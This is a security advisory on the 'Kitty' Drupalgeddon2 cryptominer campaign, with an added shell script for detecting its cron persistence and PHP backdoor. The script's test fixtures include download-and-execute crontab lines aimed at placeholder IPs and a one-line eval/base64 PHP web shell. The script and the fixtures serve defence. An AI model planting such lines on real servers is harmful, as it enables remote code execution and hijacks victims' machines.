Kitty Malware Infecting Vulnerable Drupal Sites

A new malware campaign targeting vulnerable Drupal sites installs a cryptocurrency miner and a PHP backdoor on compromised servers. Dubbed "Kitty" by security researchers at Imperva, the malware exploits the Drupalgeddon2 vulnerability (CVE-2018-7600), a remote code execution flaw in Drupal core that lets an unauthenticated attacker run arbitrary code on the web server. Once the attacker has a foothold, the popular XMRig Monero miner is installed and consumes the server's CPU to mine the cryptocurrency. Alongside the miner, a PHP backdoor is dropped, and the threat actor adds a cron job that re-downloads the malicious script every minute. Because the scheduled job keeps fetching the script, removing the miner or the backdoor alone is not enough: the server is re-infected within a minute unless the cron entry is removed as well, and an unpatched site can simply be exploited again.

The NJCCIC recommends that all Drupal site owners and administrators review the Imperva security blog for more information, ensure all Drupal sites are running the most recent patched release, run a full system scan, and follow the recovery instructions if a compromise is found. Administrators should also monitor network and host activity for anomalies indicative of cryptocurrency mining, such as sustained high CPU usage from an unfamiliar process or outbound connections to mining pools. End users are encouraged to use web browsers that proactively block cryptocurrency-mining scripts, or to install a reputable ad-blocking, script-blocking and coin-blocking extension in their current browser; note that these protect against browser-based mining and do not address a miner running on the server itself.
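The persistence mechanism described above (a cron entry that re-downloads the script every minute) and the dropped PHP backdoor are the two things an administrator has to find before cleanup will stick. The script below is an added example, not code from the NJCCIC advisory or from Imperva's analysis: it defines two heuristic checks, one that flags every-minute crontab entries that fetch remote content with curl or wget, and one that lists PHP files under a web root containing code-execution primitives typical of web shells. The sample crontab, the web-root files and the IP addresses (RFC 5737 documentation ranges) are constructed for illustration and are not real indicators.

```shell
#!/bin/sh
# Added example, not code from the NJCCIC advisory or from Imperva's analysis.
# Host-side checks for the infection pattern described in the advisory:
#   1. a cron entry that fires every minute and downloads-and-runs remote
#      content (the re-infection mechanism), and
#   2. PHP files under the web root that call functions web shells rely on.
# Every host, path and file name below is constructed for illustration.
set -eu

# Print crontab lines that run every minute ("* * * * *" or "*/1 * * * *")
# and fetch a URL with curl or wget. The command is matched anywhere after the
# schedule, so /etc/cron.d style files (schedule, user, command) match too.
# Deliberately narrow: an hourly downloader would not be flagged.
find_minute_downloaders() {
    grep -E '^[[:space:]]*(\*|\*/1)([[:space:]]+\*){4}.*[[:space:]](curl|wget)[[:space:]].*(https?|ftp)://' "$1"
}

# Number of suspicious entries in a crontab file (pipeline never aborts).
count_minute_downloaders() {
    find_minute_downloaders "$1" | wc -l | tr -d '[:space:]'
}

# Print PHP files under a directory that call functions commonly used by web
# shells to run attacker-supplied code. Legitimate code can use some of these,
# so hits are leads to review, not proof of compromise.
find_suspect_php() {
    find "$1" -type f -name '*.php' \
        -exec grep -lE '(eval|assert|system|passthru|shell_exec|base64_decode)[[:space:]]*\(' {} +
}

count_suspect_php() {
    find_suspect_php "$1" | wc -l | tr -d '[:space:]'
}

# Constructed sample crontab: benign entries mixed with the malicious pattern.
SAMPLE_CRONTAB="$(mktemp)"
cat > "$SAMPLE_CRONTAB" <<'EOF'
# benign: nightly backup
0 2 * * * /usr/local/bin/backup.sh
# benign: every minute, but purely local
* * * * * /usr/bin/php /var/www/html/cron.php
# suspicious: every minute, re-downloads and runs a remote script (constructed URL)
* * * * * curl -s http://198.51.100.23/example-miner.sh | sh
# suspicious: same schedule written as */1, wget into /tmp then execute (constructed URL)
*/1 * * * * wget -q -O /tmp/x http://203.0.113.7/x.sh && sh /tmp/x
EOF

# Constructed sample web root: one ordinary settings file, one dropped backdoor.
SAMPLE_WEBROOT="$(mktemp -d)"
mkdir -p "$SAMPLE_WEBROOT/sites/default"
printf '<?php\n$databases = array();\n' > "$SAMPLE_WEBROOT/sites/default/settings.php"
printf '<?php\nif (isset($_POST["c"])) { eval(base64_decode($_POST["c"])); }\n' \
    > "$SAMPLE_WEBROOT/sites/default/example-backdoor.php"

cleanup() {
    rm -rf "$SAMPLE_CRONTAB" "$SAMPLE_WEBROOT"
}

main() {
    echo "cron entries re-downloading remote content every minute:"
    find_minute_downloaders "$SAMPLE_CRONTAB" || echo "(none)"
    echo "PHP files calling code-execution primitives:"
    find_suspect_php "$SAMPLE_WEBROOT" || echo "(none)"
}
main "$@"
```

On a real host, point the functions at the actual inputs: `crontab -l -u www-data | find_minute_downloaders -` for each user's crontab (grep reads stdin when given `-`), the files under /etc/cron.d, and the Drupal web root for `find_suspect_php`. Remove the cron entry first, then the miner and the backdoor, and patch Drupal before the site goes back online; in the other order the cron job re-downloads the script within a minute and the cleanup is undone.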